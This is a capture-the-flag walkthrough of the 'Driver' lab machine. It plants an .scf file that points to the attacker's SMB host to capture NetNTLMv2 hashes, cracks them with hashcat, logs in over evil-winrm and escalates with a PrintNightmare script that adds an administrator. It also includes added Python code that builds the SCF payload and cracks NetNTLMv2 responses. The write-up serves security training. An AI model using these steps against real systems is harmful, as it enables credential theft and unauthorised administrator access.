Driver

Enumeration

NMAP

┌──(root💀kali)-[~]
└─# nmap -sV -sC -T4 -p- -v 10.10.11.106

Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2021-11-18T18:20:53
|_  start_date: 2021-11-18T18:12:04
|_clock-skew: mean: 7h04m58s, deviation: 0s, median: 7h04m58s

SMB and NetNTLMv2 hash grabbing

An HTTP service on port 80 (driver.htb) sits behind HTTP Basic authentication; the realm string from nmap, "MFP Firmware Update Center. Please enter password for admin", already names the account. Trying default credentials (admin:password, admin:admin) got me in.

The site offers a firmware upload form. Uploading a reverse shell went nowhere: I could not find where uploaded files land on disk, and there was no LFI to reach them with. Since SMB (445) is also open and SMB is how Windows shares files, I looked at whether the upload could be turned into an SMB interaction with my own host instead, and found this post: https://sql–injection.blogspot.com/p/smb.html

The trick relies on Explorer: when a folder containing a .scf (Shell Command File) is listed, Explorer immediately resolves the file's IconFile entry, and if that points to a UNC path it opens an SMB connection to that host and authenticates with NTLM. So the steps are: write the .scf with IconFile pointing at our address, get it onto a share or folder that someone on the target browses (here, the firmware upload), and run Responder as the SMB server so the NetNTLMv2 challenge/response of whichever user lists that folder is captured.

┌──(root💀kali)-[~]
└─# cat steal-hash.scf
[Shell]
Command=2
IconFile=\\10.10.14.7\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

┌──(root💀kali)-[~]
└─# responder --lm -v -I tun0
[+] Listening for events...

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>
[SMB] NTLMv2 Hash     : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>

Run hashid over the captured lines to confirm the format before picking a hashcat mode.

┌──(root💀kali)-[~]
└─# cat to-crack.hash 
<EDITED>

┌──(root💀kali)-[~]
└─# hashid to-crack.hash                                              
--File 'to-crack.hash'--
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
--End of file 'to-crack.hash'--

The capture is NetNTLMv2. It is a challenge/response, not a stored hash: it is salted by both the server and client challenges, so it cannot be passed like an NT hash or looked up in precomputed tables. That leaves offline cracking with hashcat mode 5600 (or relaying it to another signing-optional host, which this single-box scenario does not offer).

┌──(root💀kali)-[~]
└─# hashcat --help |grep NetNTLMv2                                    
   5600 | NetNTLMv2                                        | Network Protocols


┌──(root💀kali)-[~]
└─# hashcat -a 0 -m 5600 to-crack.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: to-crack.hash
................................
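To make the SCF-to-hashcat chain above concrete, here is an added example (my own code, not part of this write-up, Responder or hashcat) that generates the .scf, builds a NetNTLMv2 exchange from scratch following MS-NLMP, prints it in the user::domain:challenge:NTProofStr:blob format that Responder logs, and then does what hashcat -m 5600 does for one line: recompute the proof for each wordlist candidate and compare. The user "printops", domain "DRIVER", password "Winter2021!" and the challenge values are constructed for the example; MD4 is implemented inline because OpenSSL 3 builds of Python often ship without hashlib.new("md4").

```python
# Added example (not from the original write-up): NetNTLMv2 from first principles
# plus a hashcat-5600-style dictionary check. All names and values are constructed.
import hmac
import struct
from hashlib import md5
from typing import Iterable, Optional


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE encoded password."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c            # rotate registers so the next step updates "d"
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP: NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)), domain case kept;
    NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), md5).digest()
    return hmac.new(key, server_challenge + blob, md5).digest()


def build_blob(client_challenge: bytes, filetime: int, av_pairs: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: RespType 1, HiRespType 1, 6 reserved bytes, FILETIME,
    8-byte client nonce, 4 reserved bytes, AV_PAIR list, 4 trailing zero bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The line format Responder prints and hashcat -m 5600 consumes."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_5600(line: str):
    user, _, rest = line.partition("::")
    domain, chal, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack_5600(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute NTProofStr per candidate; a match means the password is correct."""
    user, domain, chal, proof, blob = parse_5600(line)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def scf_payload(unc_icon_path: str) -> str:
    """Same shape as steal-hash.scf: Explorer resolves IconFile over SMB when the folder is listed."""
    return "\r\n".join(["[Shell]", "Command=2", f"IconFile={unc_icon_path}",
                        "[Taskbar]", "Command=ToggleDesktop", ""])


# Constructed sample exchange (made-up user and password, not data captured from the box).
SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD = "printops", "DRIVER", "Winter2021!"
_server_challenge = bytes.fromhex("1122334455667788")   # example value (Responder's old fixed default)
_av_pairs = b"\x02\x00\x0c\x00" + "DRIVER".encode("utf-16-le") + b"\x00\x00\x00\x00"  # NbDomainName, EOL
_blob = build_blob(bytes.fromhex("aabbccddeeff0011"), 132816672000000000, _av_pairs)  # 2021-11-18 UTC
SAMPLE_LINE = hashcat_5600_line(
    SAMPLE_USER, SAMPLE_DOMAIN, _server_challenge,
    ntlmv2_proof(SAMPLE_PASSWORD, SAMPLE_USER, SAMPLE_DOMAIN, _server_challenge, _blob), _blob)

if __name__ == "__main__":
    print(scf_payload(r"\\10.10.14.7\share\pentestlab.ico"))
    print(SAMPLE_LINE)
    print("cracked:", crack_5600(SAMPLE_LINE, ["password", "admin", "Winter2021!"]))
```

Write SAMPLE_LINE to a file and run hashcat -a 0 -m 5600 on it with a wordlist containing Winter2021! to see both agree. Because every capture carries fresh server and client challenges, the same password produces a different line each time, which is why the only options are offline guessing (as here) or relaying the live authentication, never replay.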

smbmap

┌──(root💀kali)-[~]
└─# smbmap -H 10.10.11.106 -u <EDITED> -p '<EDITED>'
[+] IP: 10.10.11.106:445        Name: driver.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Foothold

A useful post about evil-winrm: https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md

The cracked account has no access to ADMIN$ or C$, so SMB-based execution (psexec and friends) is out. Enumeration also found 5985/tcp, which nmap labels "Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)" but which is WinRM over HTTP; any local administrator or member of Remote Management Users can open a PowerShell session there with just a password.

## Description & Purpose
This shell is the ultimate WinRM shell for hacking/pentesting.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol
that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating
Systems in order to make life easier to system administrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only
if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting
phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate
purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

It is based mainly on the WinRM Ruby library, which changed the way it works in version 2.0. Instead of using the WinRM
protocol directly, it now uses PSRP (PowerShell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.

Now that we have some understanding about the tool and we have credentials, we can proceed to getting foothold.

┌──(root💀kali)-[~]
└─# evil-winrm 

Evil-WinRM shell v3.3

Error: missing argument: ip, user

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash HASH                  NTHash
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -N, --no-rpath-completion        Disable remote path completion
    -l, --log                        Log the WinRM session
    -h, --help                       Display this help message


┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u <EDITED> -p '<EDITED>'
Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 

Windows Recon

This page is amazing and provides plenty of information on windows recon phase.

https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md#post-exploitation

  1. winPEAS.exe
## Basic information

The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.

It should take only a **few seconds** to execute almost all the checks and **some seconds/minutes during the last checks searching for known filenames** that could contain passwords (the time depends on the number of files in your home folder). By default only **some** filenames that could contain credentials are searched; you can use the **searchall** parameter to search the full list (this will add some minutes).

To enable colored version of winPEAS change the registry key value:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
The operation completed successfully.

Going through winPEAS's very long output, the network section shows spoolsv, the Print Spooler service, listening on an RPC port (PID 1188 below). On a box called Driver whose web app is a printer firmware portal, a running spooler is the obvious lead: the PrintNightmare spooler bugs (CVE-2021-1675 / CVE-2021-34527) let any authenticated user load an arbitrary DLL as SYSTEM by "installing" a printer driver. Among the other findings I chose this one because the exploit is well documented here: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

  Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               80            0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         712             svchost
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49408         0.0.0.0               0               Listening         448             wininit
  TCP        0.0.0.0               49409         0.0.0.0               0               Listening         868             svchost
  TCP        0.0.0.0               49410         0.0.0.0               0               Listening         1188            spoolsv
  TCP        0.0.0.0               49411         0.0.0.0               0               Listening         816             svchost
  TCP        0.0.0.0               49412         0.0.0.0               0               Listening         568             services
  TCP        0.0.0.0               49413         0.0.0.0               0               Listening         576             lsass
  TCP        10.10.11.106          139           0.0.0.0               0               Listening         4               System
  TCP        10.10.11.106          5985          10.10.14.7            47132           Time Wait         0               Idle
  TCP        10.10.11.106          5985          10.10.14.7            47134           Established       4               System

  Enumerating IPv6 connections

  Protocol   Local Address                               Local Port    Remote Address                              Remote Port     State             Process ID      Process Name

  TCP        [::]                                        80            [::]                                        0               Listening         4               System
  TCP        [::]                                        135           [::]                                        0               Listening         712             svchost
  TCP        [::]                                        445           [::]                                        0               Listening         4               System
  TCP        [::]                                        5985          [::]                                        0               Listening         4               System
  TCP        [::]                                        47001         [::]                                        0               Listening         4               System
  TCP        [::]                                        49408         [::]                                        0               Listening         448             wininit
  TCP        [::]                                        49409         [::]                                        0               Listening         868             svchost
  TCP        [::]                                        49410         [::]                                        0               Listening         1188            spoolsv
  TCP        [::]                                        49411         [::]                                        0               Listening         816             svchost
  TCP        [::]                                        49412         [::]                                        0               Listening         568             services
  TCP        [::]                                        49413         [::]                                        0               Listening         576             lsass

Privilege Escalation

Download the exploit file on your local kali.

┌──(root💀kali)-[/opt]
└─# git clone https://github.com/calebstewart/CVE-2021-1675

I renamed the script to print-nightmare.ps1 (under /opt/print-nightmare) and uploaded it to the target with evil-winrm's built-in upload command:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> upload /opt/print-nightmare/print-nightmare.ps1
Info: Uploading /opt/print-nightmare/print-nightmare.ps1 to C:\Users\tony\Documents\print-nightmare.ps1                                                                                                                                      


Data: 238080 bytes of 238080 bytes copied

Info: Upload successful!

Importing the script fails because the PowerShell execution policy on this host is Restricted (this is unrelated to the VirtualTerminalLevel registry key set earlier):

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
File C:\Users\<EDITED>\Documents\print-nightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module ./print-nightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand

Execution policy is a guard against accidentally running scripts, not a security boundary, so an authenticated user can simply change it. I set it to Unrestricted for the current user; note that the CurrentUser scope is written to the user's HKCU registry hive and persists on the target, whereas -Scope Process (or an explicit powershell -ExecutionPolicy Bypass) would leave no such artifact:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy                          
Restricted
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy
Unrestricted

Creating a local administrator with Invoke-Nightmare. The script drops a DLL, registers it through the spooler as a printer driver (pDriverPath is a legitimate driver; the DLL rides along as the config module), and the DLL, running as SYSTEM, adds the requested user to the local Administrators group. This leaves a new admin account on the box, so remove it when the engagement is done:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll

Logging in as the newly created user:

┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u 0xdf -p '0xdf0xdf'

*Evil-WinRM* PS C:\Users\0xdf\Documents> whoami
driver\0xdf

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4bc<EDITED>

2 thoughts on “Driver”

  1. I think this machine is really not realistic. Is it a printer? Is it a client? How can I expect an scf file being executed automatically by a user when I upload it as a printer driver? That just doesn’t make sense and would not appear like this in the real world…
